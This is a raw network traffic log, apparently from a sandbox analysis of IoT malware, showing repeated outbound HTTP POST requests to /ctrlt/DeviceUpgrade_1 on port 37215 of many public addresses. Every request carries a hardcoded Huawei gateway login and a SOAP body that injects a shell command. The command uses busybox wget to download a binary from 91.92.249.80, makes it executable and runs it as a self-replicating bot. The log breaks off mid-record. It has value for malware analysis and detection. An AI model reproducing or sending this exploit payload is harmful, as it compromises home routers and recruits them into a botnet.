                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          877192.168.2.2334172197.31.247.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249949932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          878192.168.2.2333976197.145.66.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.249967098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          879192.168.2.234163841.51.204.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265659094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          880192.168.2.235554241.111.117.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265707016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          881192.168.2.2352552157.72.119.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265707016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          882192.168.2.2351534157.229.251.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265707016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          883192.168.2.234643641.55.23.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265753031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          884192.168.2.2350512157.225.239.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265775919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          885192.168.2.2350352197.245.171.21837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265789986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          886192.168.2.2359468197.13.212.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265795946 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          887192.168.2.233624641.223.193.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.265796900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
